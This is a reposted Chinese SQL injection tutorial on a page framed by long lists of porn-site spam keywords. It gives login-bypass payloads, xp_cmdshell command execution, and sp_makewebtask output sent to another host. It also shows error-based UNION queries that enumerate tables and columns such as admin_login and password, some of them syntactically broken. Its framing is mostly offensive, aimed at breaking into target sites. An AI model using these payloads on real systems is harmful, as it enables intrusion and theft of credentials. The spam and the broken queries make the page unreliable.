亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 學院 > 開發設計 > 正文

【攻防實戰】SQL注入演練!

2019-11-17 01:25:37
字體:
來源:轉載
供稿:網友

【攻防實戰】SQL注入演練!

 這篇文章目的是讓初學者利用SQL注入技術來解決他們面臨的問題, 成功的使用它們,并在這種攻擊中保護自己。

  1.0 介紹

  當一臺機器只打開了80端口, 你最依賴的漏洞掃描器也不能返回任何有用的內容, 并且你知道管理員經常為機器打補丁, 我們就不得不使用web攻擊方式了. SQL注入是web攻擊的一種類型 ,這種方式只需要開放80端口就夠了并且即使管理員打了全部的補丁也能工作. 它攻擊的目標是web程序(像asp,jsp,php,CGI等)本身而不是web服務器或系統上運行的服務.

  本文不介紹任何新的東西, SQL注入已經被廣泛的討論和使用. 我們寫這篇文章目的是因為我們想要使用SQL注入進行一些演練測試,希望這個能對各位有用. 你可以在這里找到一兩個竅門但是請你關注下"9.0 哪里有更多的信息?" 可以得到關于SQL注入更多,更深入的技術.

  1.1 什么是SQL注入?

  通過網頁的輸入項來注入SQL查詢或命令是一種技巧。許多網頁會從用戶那里獲取參數,并構建SQL查詢來訪問數據庫。以用戶登錄為例,頁面收集用戶名和密碼然后構建SQL去查詢數據庫,來校驗用戶名和密碼的有效性。通過SQL注入,我們可以發送經過精心編造的用戶名和/或密碼字段,來改變SQL查詢語句并賦予 我們其它一些權限。

  1.2 你需要什么?

  任意web瀏覽器。

  2.0 你應該尋找什么?

  嘗試尋找那些允許你提交數據的頁面,即: 登錄頁面,查詢頁面,反饋信息等等。有時,HTML頁面會用POST命令來把參數發送到另外一個ASP頁面上去。那么,你可能在URL中看不到參數。不過,你可以查看頁面的HTML源代碼,查找"FORM"標簽。你會在一些HTML源代碼中看到類似下面的東東:

  <FORM action=Search/search.asp method=post>

  <input type=hidden name=A value=C>

  </FORM>

  位于<FORM>和</FORM>之間的所有內容都可能暗含著有用的參數(利用你的智慧)。

  2.1 如果你找不到任何帶有輸入框的頁面怎么辦?

  你應該尋找諸如ASP, JSP, CGI, 或 PHP這樣的頁面。尤其要找那些攜帶有參數的 URL,比如:

  http://duck/index.asp?id=10

  3.0 如何測試它是否是易受攻擊的?

  從一個單引號技巧開始。輸入類似這樣的內容:

  hi' or 1=1--

  到登錄頁面中,或者密碼中,甚至直接在URL中。例如:

  - Login: hi' or 1=1-- 

  - Pass: hi' or 1=1--

  - http://duck/index.asp?id=hi' or 1=1--

  假如你必須在一個hidden字段中來這樣做,就把HTML源代碼下載下來,保存到硬盤上,修改URL和相應的 hidden字段。例如:

  <FORM action=http://duck/Search/search.asp method=post>

  <input type=hidden name=A value="hi' or 1=1--">

  </FORM>

  如果夠幸運,不需要任何用戶名和密碼你就可以登錄。

  3.1 為什么是 ' or 1=1--?

  讓我們通過另外一個例子來展示' or 1=1-- 的重要性。除了能繞過“登錄”驗證,它還能展示一些在正常情況下很難看到的額外信息。假設,有一個ASP頁面,其功能是將我們導航到下面的URL:

  http://duck/index.asp?category=food

  在URL中,'category'是變量名;food是賦給變量的值。為了完成導航功能,我們猜想ASP頁面應該包含下面的代碼(這些代碼是我們為了完成此測試而編寫的真實代碼):

  v_cat = request("category")

  sqlstr="SELECT * FROM PRoduct WHERE PCategory='" & v_cat & "'"

  set rs=conn.execute(sqlstr)

  如上所示,變量v_cat獲取了參數category的值,SQL語句將變成:

  SELECT * FROM product WHERE PCategory='food'

  該SQL語句將返回符合where條件的的結果集。在本例中,where條件是PCategory='food'。

  下面,假設我們將URL改成下面的形式:

  http://duck/index.asp?category=food' or 1=1--

  現在,變量v_cat等于"food' or 1=1-- "。將變量v_cat在SQL中進行替換,我們將得到下面語句:

  SELECT * FROM product WHERE PCategory='food' or 1=1--'

  該語句將得到product表中所有記錄,無論PCategory是否等于'food'。“--”告訴MS SQL server忽略其后面的所有內容(筆者注:其實可以理解為注釋,“--”后面所有的內容都為注釋),方便我們處理單引號。在某些情況下,"--"可以被替換成”#“。

  如果后臺的數據庫不是SQL Server,查詢語句的單引號就不能被忽略。在這種情況下,我們可以嘗試下面的查詢條件:

  ' or 'a'='a

  此時,SQL語句將變成:

  SELECT * FROM product WHERE PCategory='food' or 'a'='a'

  根據真實的SQL語句,我們還可以嘗試以下各種變形:

  ' or 1=1--

  " or 1=1--

  or 1=1--

  ' or 'a'='a

  " or "a"="a

  ') or ('a'='a

  4.0 我如何通過SQL注入來進行遠程執行?

  能夠注入SQL命名通常意味著我們可以隨意執行任何SQL查詢。默認安裝的MS SQL 服務是作為SYSTEM來運行的, 它相當于 Windows系統中的Administrator。我們可以利用存儲過程,比如master..xp_cmdshell 來進行遠程執行:

  '; exec master..xp_cmdshell 'ping 10.10.1.2'--

  如果單引號(')不管用,可以試試雙引號 (")。

  分號會終止當前的SQL查詢,這就允許你開始一個新的SQL命名。要驗證命令是否執行成功,你需要監聽來自10.10.1.2的 ICMP數據包,檢查是否收到來自服務器的數據包:

  #tcpdump icmp

  如果你沒有收到任何來自服務器的ping請求,并且收到了暗示許可錯誤的信息,則有可能是管理員限制了Web用戶對存儲過程的訪問。

  5.0 如何獲取SQL查詢的輸出?

  可以通過使用sp_makewebtask把你的查詢寫入到HTML:

  '; EXEC master..sp_makewebtask "http://10.10.1.3/share/output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

  注意這個目標

  6.0 如何從數據庫的ODBC錯誤消息中獲取數據?

  我們幾乎可以在MS SQL服務器產生的錯誤消息中得到任何我們想要的數據. 通過類似下面的這個地址:

  http://duck/index.asp?id=10

  我們將試圖把這個整數'10'和另外的字符串進行UNION聯合操作:

  http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

  系統表 INFORMATION_SCHEMA.TABLES 包含了服務器上所有表的信息. 這個TABLE_NAME 字段包含數據庫中每個表的字段. 這樣就不存在無此表無此字段的問題了. 看我們的查詢語句:

  SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

  這個語句將會返回數據庫中第一個表的名字. 當我們使用這個字符串值和一個數字'10'進行UNION操作, MS SQL 服務器將會試圖轉換這個字符串(nvarchar)為一個數字. 這會產生一個錯誤, 因為我們不能把nvarchar類型轉換成數字. 服務器將會產生以下錯誤信息:

  Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

  [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int./index.asp, line 5

  這個錯誤消息清楚的告訴我們這個值不能轉換為數字. 同時呢,里面也包含了數據庫中第一個表的名字 ,就是"table1".

  想獲取下一個表的名字,我們使用下面的語句:

  http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

  我們也可以使用LIKE關鍵詞來搜索數據:

  http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

  輸出:

  Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

  [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int./index.asp, line 5

  這個匹配, '%25login%25' 的結果和 %login% 是一樣的在SQL Server服務器中.這樣,我們將得到 匹配的第一個表的名字, "admin_login".

  6.1 如何挖掘到表所有列的名稱?

  我們可以使用另一個非常有用的表INFORMATION_SCHEMA.COLUMNS 來標出某一個的表所有列名:

  http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

  輸出:

  Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

  [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int./index.asp, line 5

  注意錯誤提示,里面已經包含了第一個列名, 下面我們使用NOT IN ()來取得下一個列的名稱:

  http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

  輸出:

  Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

  [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int./index.asp, line 5

  按上面的步驟繼續下一個,我們就能獲得剩下的所有列的名稱, 即"passWord", "details"等列. 當我們得到下面的這個錯誤提示時,就表示我們已經找出所有的列名了.

  http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

  輸出:

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
日韩精品久久久久久福利| 日韩中文字幕在线免费观看| 夜夜狂射影院欧美极品| 久久不射热爱视频精品| 亚洲男人天堂网站| 欧美激情a∨在线视频播放| 91日本在线观看| www.99久久热国产日韩欧美.com| 欧美一级淫片播放口| 68精品国产免费久久久久久婷婷| 日韩精品免费在线| 成人午夜在线视频一区| 久久综合免费视频| 91精品国产高清久久久久久久久| 欧美洲成人男女午夜视频| 亚洲国产另类 国产精品国产免费| 欧美精品久久久久久久| 成人美女免费网站视频| 精品中文字幕视频| 日韩中文字幕网站| 成人在线激情视频| 国产999精品久久久影片官网| 久久久精品欧美| 国产精品视频免费在线观看| 国产男人精品视频| 欧美激情喷水视频| 国产网站欧美日韩免费精品在线观看| 中文字幕国产精品| 91欧美激情另类亚洲| 国产成人+综合亚洲+天堂| 国产精品欧美激情| 日韩日本欧美亚洲| 国产性色av一区二区| 日韩av在线免播放器| 欧美日韩国产一区二区| 国产精品国产福利国产秒拍| 精品国产福利在线| 欧美一区第一页| 欧美在线性视频| 亚洲精品日韩在线| 亚洲а∨天堂久久精品9966| 国产成人精品av| 亚洲爱爱爱爱爱| 久久精品99久久香蕉国产色戒| 在线视频亚洲欧美| 国产精品免费在线免费| 91精品免费久久久久久久久| 国产视频在线观看一区二区| 国产福利精品在线| 久久久免费电影| 国产精品视频久久久| 狠狠躁夜夜躁人人爽超碰91| 国产欧美 在线欧美| 国产精品永久免费视频| 欧美最猛黑人xxxx黑人猛叫黄| 91国内揄拍国内精品对白| 亚洲欧美制服综合另类| 国产丝袜一区二区三区| 欧洲中文字幕国产精品| 欧美最顶级丰满的aⅴ艳星| 亚洲一区二区三区成人在线视频精品| 亚洲最大激情中文字幕| 久久久www成人免费精品张筱雨| 精品久久久久久电影| 久久久亚洲成人| 国产精品视频99| 色婷婷亚洲mv天堂mv在影片| 国产精品人人做人人爽| 中文字幕av一区二区三区谷原希美| 亚洲第一精品夜夜躁人人爽| 在线播放国产精品| 久热国产精品视频| 日韩人体视频一二区| 成人在线免费观看视视频| 亚洲成人网在线| 午夜精品在线视频| 国产精品久久久久91| 777777777亚洲妇女| 麻豆乱码国产一区二区三区| 久久影院资源站| 97久久伊人激情网| 国产亚洲综合久久| 欧美激情欧美激情在线五月| 91精品国产成人| 欧美极品少妇与黑人| 国产精品日韩精品| 日本久久久a级免费| 亚洲日韩欧美视频| 中文字幕日韩高清| 成人字幕网zmw| 中文字幕亚洲图片| 欧美日韩亚洲一区二区| 在线视频欧美日韩| 亚洲色图色老头| 亚洲人成毛片在线播放| 91精品国产高清久久久久久91| 欧美日韩国产精品一区二区三区四区| 久久69精品久久久久久久电影好| 亚洲第一精品电影| 一夜七次郎国产精品亚洲| 中文字幕在线视频日韩| 91丨九色丨国产在线| 日韩在线播放视频| 久久综合伊人77777蜜臀| 久久精视频免费在线久久完整在线看| 富二代精品短视频| 在线观看免费高清视频97| 成人福利视频网| 国产精品96久久久久久| 麻豆国产va免费精品高清在线| 国产精品丝袜视频| 欧美性在线视频| 狠狠综合久久av一区二区小说| 在线日韩欧美视频| 亚洲精品久久久久中文字幕二区| 亚洲无亚洲人成网站77777| 精品国产一区二区三区久久狼黑人| 久久久精品免费| 久久艳片www.17c.com| 欧美成人精品在线播放| 国产精品盗摄久久久| 久久久亚洲精选| 精品一区精品二区| 91欧美精品成人综合在线观看| 久久久久女教师免费一区| 欧美日韩一区二区免费视频| 97视频在线观看成人| 欧美裸身视频免费观看| 久久久久中文字幕| 国产亚洲成精品久久| 久久久久久久久国产精品| 亚洲国产精品系列| 国产精品国产自产拍高清av水多| 亚洲国产成人在线视频| 亚洲日本成人网| 亚洲成av人片在线观看香蕉| 91热精品视频| 91精品国产高清自在线看超| 欧美色视频日本高清在线观看| 久久伊人91精品综合网站| 欧美在线免费视频| 北条麻妃99精品青青久久| 国产精品久久色| 国产午夜精品一区二区三区| 91国产在线精品| 欧美国产高跟鞋裸体秀xxxhd| 欧美高清第一页| 午夜美女久久久久爽久久| 久久久国产精彩视频美女艺术照福利| x99av成人免费| 欧美成人精品xxx| 精品亚洲aⅴ在线观看| 日韩精品免费在线视频观看| 日韩美女免费视频| 亚洲性av网站| 国产精品美女www爽爽爽视频| 中文综合在线观看| 国产一区二区三区高清在线观看| 久久精品这里热有精品| 91久久精品久久国产性色也91| 国产精品第2页| 久久久国产一区二区| 亚洲精品资源美女情侣酒店| 欧美日韩中文字幕在线|